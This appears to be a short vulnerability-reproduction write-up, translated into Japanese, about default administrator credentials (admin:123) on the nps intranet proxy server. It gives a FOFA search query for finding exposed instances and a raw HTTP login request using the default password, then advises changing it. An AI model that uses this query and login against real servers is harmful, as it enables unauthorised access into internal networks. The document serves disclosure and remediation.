記事ディレクトリ
nps イントラネット ペネトレーション プロキシ サーバーのデフォルト パスワードは admin:123 です。
免責事項: この記事に記載されている関連技術を違法なテストに使用しないでください。この記事で提供される情報やツールの普及と使用によって引き起こされる直接的または間接的な結果と損失は、ユーザー自身が負担するものとします。記事の著者とは何の関係もありません。この記事は教育のみを目的としています。
1. nps イントラネットペネトレーションプロキシサーバーの概要
WeChat 公式アカウント検索: 南峰脆弱性再現ライブラリ
この記事は、南峰脆弱性再現ライブラリ公式アカウントで最初に公開されました。
nps は、軽量、高性能、強力なイントラネット侵入プロキシ サーバーです。
2. 脆弱性の説明
nps は、軽量、高性能、強力なイントラネット侵入プロキシ サーバーです。現在、tcp、udp トラフィック転送をサポートしており、任意の tcp、udp 上位層プロトコル (イントラネット Web サイトへのアクセス、ローカル支払いインターフェイスのデバッグ、SSH アクセス、リモート デスクトップ、イントラネット DNS 分析など) をサポートでき、イントラネット http プロキシもサポートしています、イントラネット Socks5 プロキシ、p2p など、強力な Web 管理端末を備えています。システムのデフォルトのパスワードは admin:123 です。
CVE 番号:
CNNVD 番号:
CNVD 番号:
3. バージョンに影響を与える
4. fofaクエリステートメント
app=”nps”
5. 脆弱性の再発
これは nps の github プロジェクトで、デフォルトのアカウント パスワード admin/123 が明確に記載されています。
脆弱性パケット:
POST /login/verify HTTP/1.1
Host: 127.0.0.1:8085
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
Content-Length: 27
Content-Type: application/x-www-form-urlencoded
username=admin&password=123
6.POC&EXP
なし
7. 是正意見
デフォルトのパスワードを変更します。パスワードには、大文字と小文字、特殊文字、数字を含む 8 桁以上の数字が必要です。